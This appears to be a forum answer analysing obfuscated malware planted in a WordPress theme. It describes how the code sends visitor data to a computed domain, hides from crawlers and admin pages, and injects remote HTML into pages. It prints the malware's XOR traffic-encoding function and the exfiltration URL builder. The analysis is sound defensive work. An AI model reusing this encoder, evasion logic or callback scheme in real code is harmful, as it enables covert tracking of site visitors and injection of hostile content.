[Solved] Malicious code found in WordPress theme files. What does it do?


After digging though the obfuscated code untangling a number of preg_replace, eval, create_function statements, this is my try on explaining what the code does:

The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.

First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this).

With the contents uncompressed, a request will be made containing the $_SERVER values of

  • HTTP_USER_AGENT
  • HTTP_REFERER
  • REMOTE_ADDR
  • HTTP_HOST
  • PHP_SELF

… to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of “stat-dns.com” appended with “.com”, currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "54dfa1cb.com" / "33db9538.com".

The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.

Note that no request will be made if:

  • any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
  • PHP_SELF contains the word “admin”
  • HTTP_USER_AGENT contains any of the words “google”, “slurp”, “msnbot”, “ia_archiver”, “yandex” or “rambler”.

Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one “!NF0” string, the content between the first and second “!NF0” (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag.

The code used for encoding/decoding traffic is this one:

function en2($s, $q) {
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    return $s ^ $g;
}

$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.

The request URL mentioned above is calculated like this:

$url = "http:// ... /"
    . $op // Random number/key
    . "?"
    . urlencode(
          urlencode(
              base64_encode(en2( $http_user_agent, $op)) . "." .
              base64_encode(en2( $http_referrer,   $op)) . "." .
              base64_encode(en2( $remote_addr,     $op)) . "." .
              base64_encode(en2( $http_host,       $op)) . "." .
              base64_encode(en2( $php_self,        $op))
          )
      );

While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there.

You really should make a clean install, like suggested by @Bulk above:

The only way you’ll ever know for sure it’s been cleaned is to
re-install absolutely everything you can from scratch – i.e. fresh
wordpress install, fresh plugin install. Then literally comb every
line of your theme for anything out of the ordinary. Also of note,
they often will put things in wp-content/uploads that look like images
but aren’t – check those too.

Pastebin here.

1

solved Malicious code found in WordPress theme files. What does it do?